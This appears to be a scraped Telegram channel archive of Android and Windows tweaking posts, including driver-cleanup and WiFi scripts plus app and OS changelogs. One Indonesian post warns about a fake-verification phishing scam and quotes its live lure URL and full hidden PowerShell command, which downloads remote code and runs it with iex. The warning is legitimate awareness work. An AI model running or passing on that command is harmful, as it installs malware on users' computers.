en
Feedback
MTKPERF | MODDER

MTKPERF | MODDER

Open in Telegram

NEWS, everything. Stay up-to-date with us! Support Group: @OwlOSid

Show more
1 884
Subscribers
No data24 hours
-97 days
-1930 days
Posts Archive
$OriginalFileName = @{
  Name = "OriginalFileName"
  Expression = {$_.OriginalFileName | Split-Path -Leaf}
}
$Date = @{
  Name = "Date"
  Expression = {$_.Date.Tostring().Split("")[0]}
}
$AllDrivers = Get-WindowsDriver -Online -All | Where-Object -FilterScript {$_.Driver -like 'oem*inf'} | Select-Object -Property $OriginalFileName, Driver, ClassDescription, ProviderName, $Date, Version

Write-Verbose "`nAll installed third-party drivers" -Verbose
($AllDrivers | Sort-Object -Property ClassDescription | Format-Table -AutoSize -Wrap | Out-String).Trim()
$DriverGroups = $AllDrivers | Group-Object -Property OriginalFileName | Where-Object -FilterScript {$_.Count -gt 1}

Write-Verbose "`nDuplicate drivers" -Verbose
($DriverGroups | ForEach-Object -Process {$_.Group | Sort-Object -Property Date -Descending | Select-Object -Skip 1} | Format-Table | Out-String).Trim()
$DriversToRemove = $DriverGroups | ForEach-Object -Process {$_.Group | Sort-Object -Property Date -Descending | Select-Object -Skip 1}

Write-Verbose "`nDrivers to remove" -Verbose
($DriversToRemove | Sort-Object -Property ClassDescription | Format-Table | Out-String).Trim()

foreach ($item in $DriversToRemove)
{
  $Name = $($item.Driver).Trim()
  & pnputil.exe /delete-driver "$Name" /force
}
Delete old drivers using Get-WindowsDriver function. If you want only to display drivers to uninstall, comment out line & pnputil.exe /delete-driver "$Name" /force

Android Debloater this Script can be used via terminal to uninstall bloat Android apps. ⚠️ **Disclaimer:** You're doing this at your own risk, I am not responsible for any data loss or damage that may occur. > Btw, this script is kinda outdated, don't expect too much wkw. Dependencies:
sudo apt install -fy git adb
Usage:

chmod --recursive +x *.sh # Current folder files
chmod --recursive +x **/*.sh  # All folders inside files
bash ./android-debloater.sh

Repost from Rem01 Project
Encore Tweaks Has been Updated To Version 2.1 Special performance module for your device Changelog • Fix random game boosting
Encore Tweaks Has been Updated To Version 2.1 Special performance module for your device
Changelog
• Fix random game boosting by Mobile Legends: Bang Bang (again) • Fix CPU frequency lock on Mediatek G99 and Dimensity series and possibly other chipset (tested by @MiAzami) • Introduce unity fix • Add option to change Powersave CPU Governor on WebUI • Disable OnePlus opchain • Update Gamelist (400+ Games listed) • Use bbr2 TCP congestion if available • Specifically target internal and external storage partition for I/O Tweak • Increase I/O Read Ahead to 312KB on Performance profile for more throughput • Disable I/O add_random • Other misc optimization and changes • License change to Apache License 2.0
🌐 Chat Group 🌐 GitHub Repo 🌐 Website | DownloadSupport My Project 🧑‍💻 @rem01schannel

Repost from Rem01 Project
Hi everyone! We are working on Encore Tweaks version 2.1 with bug fixes and some adjustments As for now this is the list of k
Hi everyone! We are working on Encore Tweaks version 2.1 with bug fixes and some adjustments
As for now this is the list of known issues on previous version
• Random boosting on MLBB (Fixed, undergoing testing ✅) • Reboot after running on the Samsung S24U (Unknown cause ❓) • Random reboot on Realme 5i (Fixed, undergoing testing ✅) • Unable to lock CPU frequency (Fixed, undergoing testing ✅) • Screen delay and flickering on topaz (Unknown cause ❓)
We would like to thank you for your patience, and we continued to invest hard work in making Encore Tweaks even better with each new release. Your feedback means a lot in finding and solving these problems, so do not hesitate to share your experience in our support group. 🌐 Chat Group 🌐 GitHub Repo | WebsiteSupport My Project 🧑‍💻 @rem01schannel

skrg lg nge trend lho. hack lewat web phising munculnya verifikasi.. tar minta suruh buka cmd/win+R dan ctrl+v utk jalankan p
skrg lg nge trend lho. hack lewat web phising munculnya verifikasi.. tar minta suruh buka cmd/win+R dan ctrl+v utk jalankan perintah utk lolos.. ini jgn pernah di lakukan krn install malware ke pc nya. WASPADALAH sdh bnyk yg kena tipu example link:  https://objectstorage.ap-mumbai-1.oraclecloud.com/n/bmy7etxgksxo/b/bucket-aws-vip/o/bot-check-v1.html command:
powershell.exe -W Hidden -command  $uR='https://storageinstance.oss-ap-southeast-1.aliyuncs.com/assumption.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t`

📢 Important Announcement! We are excited to announce that our channel, previously known as MTKPerf, is now officially renamed to CodeByte Hub! This new name reflects our focus and enthusiasm for exploring the world of programming and digital technology. At CodeByte Hub, you will continue to content about coding, gadgets, tech innovations, and much more. We hope this new name also strengthens our community. regards, CodeByte Hub Team

+3
WW_win95_v004_dark_post.png11.84 MB

wallpaper futuristic HD
+3
wallpaper futuristic HD

#OFFICIAL #WINDOWS #WIN11 OwlOS Project v5.0 [RELEASE] • Author: @Akemiinawa • Build update: November 10, 2024 12:48 AM • Win
#OFFICIAL #WINDOWS #WIN11 OwlOS Project v5.0 [RELEASE] • Author: @Akemiinawa • Build update: November 10, 2024 12:48 AM • Windows Version: Windows 11 24H2 Changelogs (Windows 11): [-] Updated build for OwlOS 10 (22H2) to 19045.5011 [-] We're done with OwlOS 11 (23H2) and moved to 24H2 on 26100.2033 build [-] Updated network drivers for Realtek (v10.73) and Intel (v29.3) [-] Applied minor updates in regedits and scripts. Credits: AMIT (and contributors who's help in his project https://github.com/amitxv/PC-Tuning/contributors) Imribiy NTLite forum OwlOS Dump Staff

AnimatedSticker.tgs0.02 KB

FAQ : What should I do after system installation? Only thing you need to do is install any browser from "OwlOS\Browser" folder and then Graphics Driver from "OwlOS\GPU Drivers" folder. Alternatively, you can enable some of the features you need, such as Bluetooth, printing etc. from "OwlOS\Services and Features" folder. Does OwlOS 11 have TPM 2.0 and Secure Boot requirements? No, TPM 2.0 and Secure Boot is not required while installing system. Can I play FACEIT/ESEA on OwlOS 10/11? Yes, but you need to have installed latest version of OwlOS 10/11 with latest security updates. If you already have it you need to do a few steps: Enable 'DEP' from "OwlOS\Services and Features\DEP" folder. Enable 'TPM 2.0' and 'Secure Boot' in BIOS. Why feature 'X' is not working? Probably it's disabled because in OwlOS we disabling some of services and drivers by default to reduce system load. You can enable feature 'X' from "OwlOS\Services and Features" folder if it's there, if not you can set default windows services and drivers using .reg file. To do this you need to open 'NSudo.exe' program which is located in the same folder. Make sure you have set the check box 'Enable All Privileges' and the next drag and drop 'Default Windows Services and Drivers.reg' file onto the program and click 'Run' button and then reboot computer to apply changes. Why feature 'X' is not working? Probably it's disabled because in OwlOS we disabling some of services and drivers by default to reduce system load. You can enable feature 'X' from "OwlOS\Services and Features" folder if it's there, if not you can set default windows services and drivers using .reg file. To do this you need to open 'NSudo.exe' program which is located in the same folder. Make sure you have set the check box 'Enable All Privileges' and the next drag and drop 'Default Windows Services and Drivers.reg' file onto the program and click 'Run' button and then reboot computer to apply changes. What SHA-1/256 is original for OwlOS? OwlOS 10 (22H2) v0.6 SHA-1: e378d7b966776b733ee18db144ecabe0b58d5a35 SHA-256: 411b0b1358af7b79206f68dddd945df094375ef91a25cef90ee9cc1a9c2ffcec OwlOS 11 (24H2) v0.1 (early access) SHA-1: 3462ad59b037ae6f279a68390277ae00e4c3ccc1 SHA-256: 920a87cc9dbf70621a00a0008d1168aa64acc3cf5ec0659b45611280ab26a9e7 The shortcut of OwlOS folder is located on the desktop by default, but if you deleted the shortcut, folder will be located in "C:\Program Files\OwlOS".

If the script for enabling WiFi doesn't work for someone, I'm sending the updated script.
@echo off
::Running script as administrator
>nul 2>&1 reg.exe query "HKU\S-1-5-19" || (
    echo set UAC = CreateObject^("Shell.Application"^) > "%temp%\Getadmin.vbs"
    echo UAC.ShellExecute "%~f0", "%1", "", "runas", 1 >> "%temp%\Getadmin.vbs"
    "%temp%\Getadmin.vbs"
    DEL /f /q "%temp%\Getadmin.vbs" >nul 2>&1
    exit /b
)

echo Enabling WiFi...
echo.

Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\DcomLaunch" /v "Start" /t REG_DWORD /d "2" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinHttpAutoProxySvc" /v "Start" /t REG_DWORD /d "2" /f
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WlanSvc" /v "Start" /t REG_DWORD /d "2" /f

echo.
echo WiFi Enabled, Reboot Computer for Apply Changes.

pause

Repost from Rem01 Project
Encore Tweaks Has been Updated To Version 2.0 Special performance module for your device Changelog • Fix random game boosting
Encore Tweaks Has been Updated To Version 2.0 Special performance module for your device
Changelog
• Fix random game boosting by Mobile Legends: Bang Bang • Logs more useful info • Kill more logger service (via Kill Logger on WebUI) • Clicking Encore on WebUI now will open Encore Tweaks website
🌐 Chat Group 🌐 GitHub Repo 🌐 Website | DownloadSupport My Project 🧑‍💻 @rem01schannel

Kuma Anime (rebrand animasu) v3.0 for stable version Maintainer: @Akemiinawa V3.0 Changelogs: Changes: - [ ] Added light theme - [ ] Added setting to set a default provider - [ ] Added customizable download path (You will need to provide "allow access to manage all files" permission for custom path, otherwise it will show a error while downloading anime/saving an image) - [ ] Added material theme (uses accent from wallpaper, for android 12 and above) - [ ] Added playback speed in player (only till 2x, its the limit from the plugin) - [ ] Removed source: katanime due to playback issues and corrupted downloaded files - [ ] Added source: AnimeOnsen, with soft subs - [ ] Theme changes doesnt need a restart anymore! - [ ] Minor UI additions here and there as well - [ ] Download speed is now increased - [ ] Added faster download option - [ ] Fixed streamwish server not showing up most times - [ ] Fixed alions server not showing up - [ ] Fixed skip to next episode button not obeying your server preference - [ ] Redesigned settings page - [ ] The player will select the previously selected server on skipping episode - [ ] Themes are now loaded by using id's - [ ] Added app bar for news pages - [ ] Added scrollbar to grids of genre and tags in genres page - [ ] Added slider to control translucency and transparency of navbar - [ ] Added rating to normal(saikou) style cards - [ ] Migrated to latest flutter version - [ ] Background black color is now optional - [ ] Added preferred quality option to set a default quality for streaming - [ ] You can now change the source of the stream while in the player screen - [ ] Implemented episode selection in the player screen - [ ] Now you dont have to use manual search (option) every time you wish to watch an anime. The app will save your previous search - [ ] Reworked on genre page - [ ] The images should now load substantially faster after being loaded once - [ ] Added debounced searching in the search page - [ ] Improved minor UI elements - [ ] Improved some player logics Fixed: - [ ] Fixed Infinite loading in homescreen when the planned list is empty - [ ] Removed unnecessary permission requests - [ ] Fixed item size in manual search bottom sheet - [ ] Fixed many UI bugs/imperfections (a lot) - [ ] Fixed a blank space at very top of discover page - [ ] Fixed the page not automatically being selected in info page - [ ] Fixed same result appearing multiple times while searching for a anime - [ ] Fixed extra padding for setting icon in discover page - [ ] Fixed a bug which caused the app to crash during startup - [ ] The next episode will always play from the previously selected server from now - [ ] Fixed some issues with the player - [ ] Fixed some UI glitches - [ ] Fixed downloads not starting because of lack of permission - [ ] Bootup will be quick since the splash screen is implemented natively - [ ] Fixed Setting page not being scrollable on landscape mode - [ ] Fixed episode list not reloading on changing server while there is an error in loading episodes - [ ] Fixed theme not applying properly - [ ] Fixed server list/download list not scrollable while the list overflows the bottom sheet Notes: • Install it and report me if there still any problem, this is a beta version. thats why i didn't provide it to the force update. tell me if it has any bug or I should improve it more

e

Repost from Rem01 Project
Pyrox Thermal Freeze and kill any userspace thermal service in sight (or preferably disable Thermal) WARNING: Overheat and fi
Pyrox Thermal Freeze and kill any userspace thermal service in sight (or preferably disable Thermal)
WARNING: Overheat and fire ahead
Developer doesn't account for any damages from using this module, use it at your own risk.
🗂️ Download | AlternativeSupport My Project 🧑‍💻 @rem01schannel

[Sun 3 Nov, 21:28 UTC+7] Fixed, website back online.

Repost from Rem01 Project
Emergency Maintenance Notice We detected some weird issues on our website DNS records causes the website to become inaccessib
Emergency Maintenance Notice We detected some weird issues on our website DNS records causes the website to become inaccessible, this affects rem01gaming.dev and its subdomains (including Encore Tweaks website). 📝 Maintenance Period: TBD ✧ Maintenance times may change based on conditions.

Repost from Rem01 Project
Encore Tweaks Has been Updated To Version 1.8 Special performance module for your device Changelog • [HOTFIX] Fix DRAM and CP
Encore Tweaks Has been Updated To Version 1.8 Special performance module for your device
Changelog
[HOTFIX] Fix DRAM and CPU Bus frequency scaling for some Snapdragon devices • Add encore logo on shell notification
🌐 Chat Group 🌐 GitHub Repo 🌐 Website | DownloadSupport My Project 🧑‍💻 @rem01schannel

Repost from Rem01 Project
If you like my work, please follow me / star my work (Encore Tweaks, Origami Kernel Manager) on GitHub You can also show your care by making donation on Buymeacoffee or Saweria Thanks (⁠◍⁠•⁠ᴗ⁠•⁠◍⁠)